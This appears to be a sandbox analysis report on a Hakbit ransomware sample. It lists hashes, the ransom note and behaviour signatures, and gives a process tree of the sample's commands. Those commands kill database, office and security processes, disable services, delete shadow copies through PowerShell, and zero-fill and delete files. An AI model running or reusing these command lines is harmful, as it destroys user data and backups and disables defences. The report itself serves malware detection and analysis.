Overview

overview

10

Static

static

10

08751be484...2d.dll

windows7_x64

10

08751be484...2d.dll

windows10_x64

10

0a9f79abd4...51.exe

windows7_x64

3

0a9f79abd4...51.exe

windows10_x64

3

0di3x.bin.exe

windows7_x64

10

0di3x.bin.exe

windows10_x64

10

1.bin/1.exe

windows7_x64

10

1.bin/1.exe

windows10_x64

10

4a30275f14...ab.dll

windows7_x64

10

4a30275f14...ab.dll

windows10_x64

1

2019-09-02...10.exe

windows7_x64

10

2019-09-02...10.exe

windows10_x64

10

2b5e50bc30...ba.dll

windows7_x64

10

2b5e50bc30...ba.dll

windows10_x64

10

2c01b00772...eb.exe

windows7_x64

10

2c01b00772...eb.exe

windows10_x64

1

31.exe

windows7_x64

10

31.exe

windows10_x64

10

3DMark 11 ...on.exe

windows7_x64

1

3DMark 11 ...on.exe

windows10_x64

1

42f9729255...61.exe

windows7_x64

10

42f9729255...61.exe

windows10_x64

10

42f9729255...1).exe

windows7_x64

10

42f9729255...1).exe

windows10_x64

10

5da0116af4...18.exe

windows7_x64

8

5da0116af4...18.exe

windows10_x64

8

69c56d12ed...6b.exe

windows7_x64

10

69c56d12ed...6b.exe

windows10_x64

10

6a9e7107c9...91.exe

windows7_x64

10

6a9e7107c9...91.exe

windows10_x64

10

905d572f23...50.exe

windows7_x64

1

905d572f23...50.exe

windows10_x64

1

Resubmissions

03-07-2024 16:04

240703-thygmaycpc 10

01-07-2024 18:12

240701-ws6xvswbkj 10

01-07-2024 18:03

240701-wm5sls1gka 10

01-07-2024 18:03

240701-wm39sa1gjf 10

01-07-2024 18:03

240701-wm2e7avhkj 10

01-07-2024 18:03

240701-wmzxcs1fre 10

01-07-2024 18:02

240701-wmzats1frc 10

01-07-2024 18:02

240701-wmvbwa1fqh 10

22-11-2023 17:02

231122-vkac9adg64 10

Analysis

  • max time kernel
    70s
  • max time network
    127s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    19-01-2021 19:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe

  • Size

    80KB

  • MD5

    8152a3d0d76f7e968597f4f834fdfa9d

  • SHA1

    c3cf05f3f79851d3c0d4266ab77c8e3e3f88c73e

  • SHA256

    69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b

  • SHA512

    eb1a18cb03131466a4152fa2f6874b70c760317148684ca9b95044e50dc9cd19316d6e68e680ce18599114ba73e75264de5dab5afe611165b9c6c0b5f01002b4

Score
10/10
hakbitransomwarespyware

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt

Family

hakbit

Ransom Note
To recover your data contact the email below [email protected] Key Identifier: LdmmWU9wdcfM7fZaaclYCCu3xyg3UKEwI4eRAGn0Qwoof5xqHy9Q3hhNC5q477rpNjETRwuMA+2qEQCKUzBzmgDljmGUtmOcLFCqvdUbNUGO6iY7IMRgpAmgGnV4cIqofIU7TWzucra8UecV86wPRFTLEmj8OUSBuU1NgGBZnRDnbN+ZaJdl3vBy+Yp1KCsWNhoPKSWAC+exMWrrsd1uIyJAtW4itL1kWuhwE773CiMIAUTTNWpJSONDlCoc8d4CBThkZrLh4pjuCn9K2qP9xKEPPdl9IJ9LZMPN21wgQ+wHHPcKogfSZNwPzDuhZeKfCyv62PLrgK1+0ZTAP4y7E4Qj0SUcMsUwwoJmTBjBaz5SwNoaMIk3oEo/Xu1bSyO14WmMyMO4B4jlFTEFKZZpyS8T5LM+Tj/KvBdzpAQ6MfPslEGlFiYr5gakLgkx6DZCtsyC9S/XOMo39dKtQYpMJaA+GrcrK7iL+4BVPmASlIE2I2/+fgu0qGsqDTEk+WewgB7v+oiareMb9TwpKXG6B9cudHm5pfHRgCClJYd9sPpQhGF1fI42DU14ibwLz6M7isKFn+x7PprXMOSRxbtpfldANAiUaC9y0wsezGntGtm3xChuNKFD0P3fBNTQM+DTodmX0bAfBln1TGVAMMMoj+qm6scVls/ZK0BZAbKe85g= Number of files that were processed is: 1218

Signatures

  • Hakbit

    Ransomware which encrypts files using AES, first seen in November 2019.

    ransomwarehakbit
  • Drops startup file 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Kills process with taskkill 47 IoCs
    evasion
  • Opens file in notepad (likely ransom note) 1 IoCs
    ransomware
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 24328 IoCs
  • Suspicious use of AdjustPrivilegeToken 48 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of WriteProcessMemory 118 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
    "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe"
    1⤵
    • Drops startup file
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:4816
    • C:\Windows\SYSTEM32\sc.exe
      "sc.exe" config SQLTELEMETRY start= disabled
      2⤵
        PID:4128
      • C:\Windows\SYSTEM32\cmd.exe
        "cmd.exe" /c rd /s /q %SYSTEMDRIVE%\$Recycle.bin
        2⤵
          PID:3468
        • C:\Windows\SYSTEM32\sc.exe
          "sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
          2⤵
            PID:3568
          • C:\Windows\SYSTEM32\sc.exe
            "sc.exe" config SstpSvc start= disabled
            2⤵
              PID:3824
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mspub.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4244
            • C:\Windows\SYSTEM32\taskkill.exe
              "taskkill.exe" /IM mydesktopqos.exe /F
              2⤵
              • Kills process with taskkill
              • Suspicious use of AdjustPrivilegeToken
              PID:4280
            • C:\Windows\SYSTEM32\sc.exe
              "sc.exe" config SQLWriter start= disabled
              2⤵
                PID:3560
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mydesktopservice.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4300
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mysqld.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:712
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM sqbcoreservice.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4192
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM firefoxconfig.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4432
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM agntsvc.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4052
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM thebat.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:380
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM steam.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4524
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM encsvc.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:528
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM excel.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:636
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM CNTAoSMgr.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1436
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM sqlwriter.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1620
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM tbirdconfig.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1876
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM thebat64.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2608
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM dbeng50.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2380
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM ocomm.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2116
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM infopath.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2676
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mbamtray.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:216
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM zoolz.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1396
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" IM thunderbird.exe /F
                2⤵
                • Kills process with taskkill
                PID:4356
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM dbsnmp.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4596
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM xfssvccon.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2268
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mspub.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3920
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM Ntrtscan.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:1616
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM isqlplussvc.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4212
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM onenote.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4296
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM PccNTMon.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:2364
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM msaccess.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4228
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM outlook.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:828
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM tmlisten.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3656
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM msftesql.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3896
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM powerpnt.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:208
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mydesktopqos.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4624
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM visio.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:4376
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM mydesktopservice.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:3620
              • C:\Windows\SYSTEM32\taskkill.exe
                "taskkill.exe" /IM winword.exe /F
                2⤵
                • Kills process with taskkill
                • Suspicious use of AdjustPrivilegeToken
                PID:664
                • C:\Windows\System32\Conhost.exe
                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  3⤵
                    PID:4356
                • C:\Windows\SYSTEM32\taskkill.exe
                  "taskkill.exe" /IM mysqld-nt.exe /F
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5136
                • C:\Windows\SYSTEM32\taskkill.exe
                  "taskkill.exe" /IM mysqld-opt.exe /F
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5216
                • C:\Windows\SYSTEM32\taskkill.exe
                  "taskkill.exe" /IM ocautoupds.exe /F
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5320
                • C:\Windows\SYSTEM32\taskkill.exe
                  "taskkill.exe" /IM wordpad.exe /F
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5180
                • C:\Windows\SYSTEM32\taskkill.exe
                  "taskkill.exe" /IM ocssd.exe /F
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5380
                • C:\Windows\SYSTEM32\taskkill.exe
                  "taskkill.exe" /IM oracle.exe /F
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5416
                • C:\Windows\SYSTEM32\taskkill.exe
                  "taskkill.exe" /IM sqlagent.exe /F
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5504
                • C:\Windows\SYSTEM32\taskkill.exe
                  "taskkill.exe" /IM sqlbrowser.exe /F
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5536
                • C:\Windows\SYSTEM32\taskkill.exe
                  "taskkill.exe" /IM sqlservr.exe /F
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5680
                • C:\Windows\SYSTEM32\taskkill.exe
                  "taskkill.exe" /IM synctime.exe /F
                  2⤵
                  • Kills process with taskkill
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5708
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  "powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
                  2⤵
                  • Suspicious use of AdjustPrivilegeToken
                  PID:5740
                • C:\Windows\System32\notepad.exe
                  "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.txt
                  2⤵
                  • Opens file in notepad (likely ransom note)
                  PID:6452
                • C:\Windows\SYSTEM32\cmd.exe
                  "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
                  2⤵
                    PID:6464
                    • C:\Windows\system32\PING.EXE
                      ping 127.0.0.7 -n 3
                      3⤵
                      • Runs ping.exe
                      PID:4976
                    • C:\Windows\system32\fsutil.exe
                      fsutil file setZeroData offset=0 length=524288 “%s”
                      3⤵
                        PID:5932
                    • C:\Windows\System32\cmd.exe
                      "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\69c56d12ed7024696936fb69b4c6bee58174a275cb53fa966646a0b092d9626b.exe
                      2⤵
                        PID:6516
                        • C:\Windows\system32\choice.exe
                          choice /C Y /N /D Y /T 3
                          3⤵
                            PID:6036

                      Network

                      MITRE ATT&CK Enterprise v6

                      Replay Monitor

                      Loading Replay Monitor...

                      Downloads

                      • memory/4816-2-0x00007FFBE4620000-0x00007FFBE500C000-memory.dmp

                        Filesize

                        9.9MB

                        Download

                      • memory/4816-10-0x000000001B0C0000-0x000000001B0C2000-memory.dmp

                        Filesize

                        8KB

                        Download

                      • memory/4816-3-0x0000000000370000-0x0000000000371000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/5740-64-0x000002CCB98D3000-0x000002CCB98D5000-memory.dmp

                        Filesize

                        8KB

                        Download

                      • memory/5740-60-0x000002CCA11F0000-0x000002CCA11F1000-memory.dmp

                        Filesize

                        4KB

                        Download

                      • memory/5740-63-0x000002CCB98D6000-0x000002CCB98D8000-memory.dmp

                        Filesize

                        8KB

                        Download

                      • memory/5740-59-0x00007FFBE4620000-0x00007FFBE500C000-memory.dmp

                        Filesize

                        9.9MB

                        Download

                      • memory/5740-62-0x000002CCB98D0000-0x000002CCB98D2000-memory.dmp

                        Filesize

                        8KB

                        Download

                      • memory/5740-61-0x000002CCBC240000-0x000002CCBC241000-memory.dmp

                        Filesize

                        4KB

                        Download